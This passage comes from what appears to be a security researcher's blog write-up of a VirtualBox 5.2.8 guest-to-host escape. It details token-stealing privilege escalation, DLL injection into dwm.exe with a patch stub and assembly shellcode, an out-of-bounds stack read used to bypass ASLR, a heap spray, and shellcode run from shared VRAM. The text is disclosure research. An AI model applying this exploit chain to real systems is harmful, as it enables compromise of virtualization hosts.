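<p>main returns 0 only if all three states behave as described. In the second state the example deliberately inspects the stale qword instead of dereferencing [pThis+0x320], since that dereference is the crash the ticket describes. The single same-size reallocation in the third state stands in for the heap spray the advisory describes: the real exploit cannot choose which chunk the allocator hands back, so it fills many candidate chunks with the same controlled first qword.<\/p>
<p>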
In theory, on guest OSes other than Windows 10, elevated privileges may not be required.<\/p>\n<p><b>Exploitation Algorithm<\/b><\/p>\n<ol>\n<li>An attacker runs vrdpexploit_launcher.exe with elevated privileges.<\/li>\n<li>Stage 1: escalation\n<ol>\n<li>The launcher loads the driver.<\/li>\n<li>The driver escalates the privileges of the launcher process and of the dwm.exe process to SYSTEM.<\/li>\n<\/ol>\n<\/li>\n<li>Stage 2: hijacking\n<ol>\n<li>The launcher injects the library into the dwm.exe process and hijacks an identifier that is required to successfully spray the host heap later.<\/li>\n<li>The hijacked identifier is returned to the launcher.<\/li>\n<\/ol>\n<\/li>\n<li>Stage 3: exploitation\n<ol>\n<li>The launcher suspends the dwm.exe process to stop any guest-host communication related to display updates. The display is &#8220;frozen&#8221;.<\/li>\n<li>The driver connects to the Chromium service (the host-side 3D acceleration service) via HGSMI (Host-Guest Shared Memory Interface).<\/li>\n<li>The driver sends a Chromium command that produces an information leak and obtains host addresses.<\/li>\n<li>The driver sends commands to the host to spray the heap.<\/li>\n<li>The driver writes shellcode to video memory. VRAM is shared between the guest and the host, and on the host side the mapped VRAM region has RWX attributes set.<\/li>\n<li>The driver reverts the privileges of dwm.exe.<\/li>\n<\/ol>\n<\/li>\n<li>Final stage\n<ol>\n<li>The attacker closes the RDP connection, which triggers execution of the shellcode in VRAM on the host and spawns \/usr\/bin\/xterm.<\/li>\n<li>On the guest, the launcher resumes the dwm.exe process and exits. The display is &#8220;unfrozen&#8221; and the VM continues to work.<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<p><b>Details<\/b><br \/> <i>Stage 1: Escalation<\/i><br \/> The launcher (vrdpexploit_launcher.exe) loads the driver (vrdpexploit.sys) and sends an IOCTL_ESCALATE request. The driver finds the EPROCESS structures of the System process, the launcher, and dwm.exe. 
Then it saves the access token of the dwm.exe process so that it can be restored after exploitation, and replaces the tokens of the launcher and of dwm.exe with the token of System.<\/p>\n<p><i>Stage 2: Hijacking<\/i><br \/> Stephen Fewer&#8217;s Reflective DLL Injection tool is used to simplify the injection. When the library (hostid_hijacker.dll) is injected into dwm.exe, it patches the following code so that it jumps to a shellcode.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f52d507677593\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 
16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> (\/VirtualBox-5.2.8\/src\/VBox\/Additions\/WINNT\/Graphics\/Video\/disp\/wddm\/VBoxDispD3D.cpp)  static HRESULT APIENTRY vboxWddmDDevPresent(HANDLE hDevice, CONST D3DDDIARG_PRESENT* pData)  {  &#8230;  #ifdef VBOX_WITH_CROGL          if (pAdapter-&gt;u32VBox3DCaps &amp; CR_VBOX_CAP_TEX_PRESENT)          {              IDirect3DSurface9 *pSrcSurfIf = NULL;              hr = VBoxD3DIfSurfGet(pSrcRc, pData-&gt;SrcSubResourceIndex, &amp;pSrcSurfIf);  &#8230;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f52d507677593-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f52d507677593-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f52d507677593-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f52d507677593-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f52d507677593-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f52d507677593-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f52d507677593-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f52d507677593-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f52d507677593-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f52d507677593-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div 
class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f52d507677593-1\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VirtualBox<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">5.2.8<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VBox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Additions<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">WINNT<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Graphics<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Video<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">disp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">wddm<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VBoxDispD3D<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cpp<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f52d507677593-2\"><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HRESULT <\/span><span class=\"crayon-e\">APIENTRY <\/span><span class=\"crayon-e\">vboxWddmDDevPresent<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">HANDLE <\/span><span class=\"crayon-v\">hDevice<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">CONST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">D3DDDIARG_PRESENT*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pData<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f52d507677593-3\"><span 
class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f52d507677593-4\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f52d507677593-5\"><span class=\"crayon-p\">#ifdef VBOX_WITH_CROGL<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f52d507677593-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pAdapter<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">u32VBox3DCaps<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR_VBOX_CAP_TEX_PRESENT<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f52d507677593-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f52d507677593-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">IDirect3DSurface9 *<\/span><span class=\"crayon-v\">pSrcSurfIf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f52d507677593-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">hr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">VBoxD3DIfSurfGet<\/span><span 
class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pSrcRc<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pData<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">SrcSubResourceIndex<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">pSrcSurfIf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f52d507677593-10\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0024 seconds] -->  <\/p>\n<p class=\"Textbody\">The patch overwrites the code immediately after the VBoxD3DIfSurfGet call with the following stub:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f53a853480727\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> BYTE gPatch[] =  \"\\xE8\\x00\\x00\\x00\\x00\"                      \/\/ call $+5  \"\\x58\"                                      \/\/ pop rax  \"\\x48\\x83\\xE8\\x05\"                          \/\/ sub rax, 5  \"\\x50\"                                      \/\/ push rax  \"\\x48\\xB8\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"  \/\/ mov rax, 0x4141414141414141  \"\\x50\"                                      \/\/ push rax  \"\\xC3\";                                     \/\/ ret<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f53a853480727-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f53a853480727-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f53a853480727-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f53a853480727-4\">4<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-5b7b3e582f53a853480727-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f53a853480727-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f53a853480727-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f53a853480727-8\">8<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f53a853480727-1\"><span class=\"crayon-t\">BYTE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gPatch<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f53a853480727-2\"><span class=\"crayon-s\">\"\\xE8\\x00\\x00\\x00\\x00\"<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ call $+5<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f53a853480727-3\"><span class=\"crayon-s\">\"\\x58\"<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ pop rax<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f53a853480727-4\"><span class=\"crayon-s\">\"\\x48\\x83\\xE8\\x05\"<\/span><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ sub rax, 5<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f53a853480727-5\"><span class=\"crayon-s\">\"\\x50\"<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ push rax<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f53a853480727-6\"><span class=\"crayon-s\">\"\\x48\\xB8\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ mov rax, 0x4141414141414141<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f53a853480727-7\"><span class=\"crayon-s\">\"\\x50\"<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ push rax<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f53a853480727-8\"><span class=\"crayon-s\">\"\\xC3\"<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/ ret<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0011 seconds] -->  <\/p>\n<p>At startup time, before 
patching, the library overwrites the 0x4141414141414141 placeholder with the address of the shellcode.<\/p>\n<div id=\"crayon-5b7b3e582f540970066329\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<pre>PUBLIC Shellcode\n\nEXTERN gHostId: DWORD\nEXTERN RestoreBytes: PROC\n\n.CODE\n\nShellcode PROC\n\n\t; We should preserve all the registers because it's not known\n\t; which of them will be used in RestoreBytes()\n\tpush rax\n\tpush rbx\n\tpush rcx\n\tpush rdx\n\tpush rsi\n\tpush rdi\n\tpush r8\n\tpush r9\n\tpush r10\n\tpush r11\n\tpush r12\n\tpush r13\n\tpush r14\n\tpush r15\n\n\t; IDirect3DSurface9* pSrcSurfIf = [rsp + 0260h]\n\t; We add 8 because the shellcode is called by the patch (return address on the stack)\n\t; We also add 112 to account for all the pushes above (8 * 14)\n\tmov rax, qword ptr [rsp + 0260h + 08h + 070h]\n\n\t; wined3d_surface* surface = ((d3d9_surface*)pSrcSurfIf)-&gt;wined3d_surface\n\tmov rax, qword ptr [rax + 010h]\n\n\t; uint32_t hostId = surface-&gt;texture_name\n\tmov eax, dword ptr [rax + 0F4h]\n\n\t; Save Host ID\n\tmov dword ptr [gHostId], eax\n\n\t; Replace the patch with the original bytes so the shellcode will not be called anymore\n\tcall RestoreBytes\n\n\tpop r15\n\tpop r14\n\tpop r13\n\tpop r12\n\tpop r11\n\tpop r10\n\tpop r9\n\tpop r8\n\tpop rdi\n\tpop rsi\n\tpop rdx\n\tpop rcx\n\tpop rbx\n\tpop rax\n\n\tret\n\nShellcode ENDP\n\nEND<\/pre><\/div>\n<p>The shellcode takes pSrcSurfIf, the value returned by VBoxD3DIfSurfGet, and walks several structures to reach the Host ID. After that the shellcode restores the original bytes at the location of the jumper. This process of patching, hijacking, and restoring is repeated 4 times, because there are several Host IDs and we must not accidentally take the lowest one. For more details, see the HostIdHijacker.c file (not included in this blog post; for details on how to obtain it, see the bottom of this post).<\/p>\n<p>After the Host ID is gathered, it is returned to the launcher process via WriteProcessMemory.<\/p>\n<p><i>Stage 3: Exploitation<\/i><br \/> <b>Preparations<\/b><br \/> The dwm.exe process is suspended using the PsSuspend tool from Sysinternals.<br \/> The launcher sends the IOCTL_EXPLOIT command to the driver. The driver initializes the HGSMI interface to communicate with the host.<\/p>\n<p><b>ASLR Bypass<\/b><\/span><\/p>\n<p>To bypass ASLR we need an additional vulnerability, ideally an information leak. There is such a vulnerability in the handler of the CR_GETCHROMIUMPARAMETERVCR_EXTEND_OPCODE Chromium command. The handler allocates a buffer on the stack and then reads from it with a length specified in the command, without a bounds check. 
This way we are able to obtain addresses inside VBoxSharedCrOpenGL.so and VBoxDD.so.<\/p>\n<div id=\"crayon-5b7b3e582f547537569397\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">(\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/server_misc.c)\nvoid SERVER_DISPATCH_APIENTRY crServerDispatchGetChromiumParametervCR(GLenum target, GLuint index, GLenum type, GLsizei count, GLvoid *values)\n{\n    GLubyte local_storage[4096];\n    GLint bytes = 0;\n\n    switch (type) {\n    case GL_BYTE:\n    case GL_UNSIGNED_BYTE:\n         bytes = count * sizeof(GLbyte);\n         break;\n    case GL_SHORT:\n    case GL_UNSIGNED_SHORT:\n         bytes = count * sizeof(GLshort);\n         break;\n    case GL_INT:\n    case GL_UNSIGNED_INT:\n         bytes = count * sizeof(GLint);\n         break;\n    case GL_FLOAT:\n         bytes = count * sizeof(GLfloat);\n         break;\n    case GL_DOUBLE:\n         bytes = count * sizeof(GLdouble);\n         break;\n    default:\n         crError(\"Bad type in crServerDispatchGetChromiumParametervCR\");\n    }\n\n    &#8230;\n\n    crServerReturnValue( local_storage, bytes );\n}<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-1\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VirtualBox<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">5.2.8<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VBox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">HostServices<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SharedOpenGL<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">crserverlib<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">server_misc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-2\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">SERVER_DISPATCH_APIENTRY <\/span><span class=\"crayon-e\">crServerDispatchGetChromiumParametervCR<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">GLenum <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GLuint <\/span><span class=\"crayon-v\">index<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-e\">GLenum <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GLsizei <\/span><span class=\"crayon-v\">count<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GLvoid *<\/span><span class=\"crayon-v\">values<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-3\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">GLubyte <\/span><span class=\"crayon-v\">local_storage<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4096<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">GLint <\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">switch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">GL_BYTE<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GL_UNSIGNED_BYTE<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">count *<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">GLbyte<\/span><span class=\"crayon-sy\">)<\/span><span 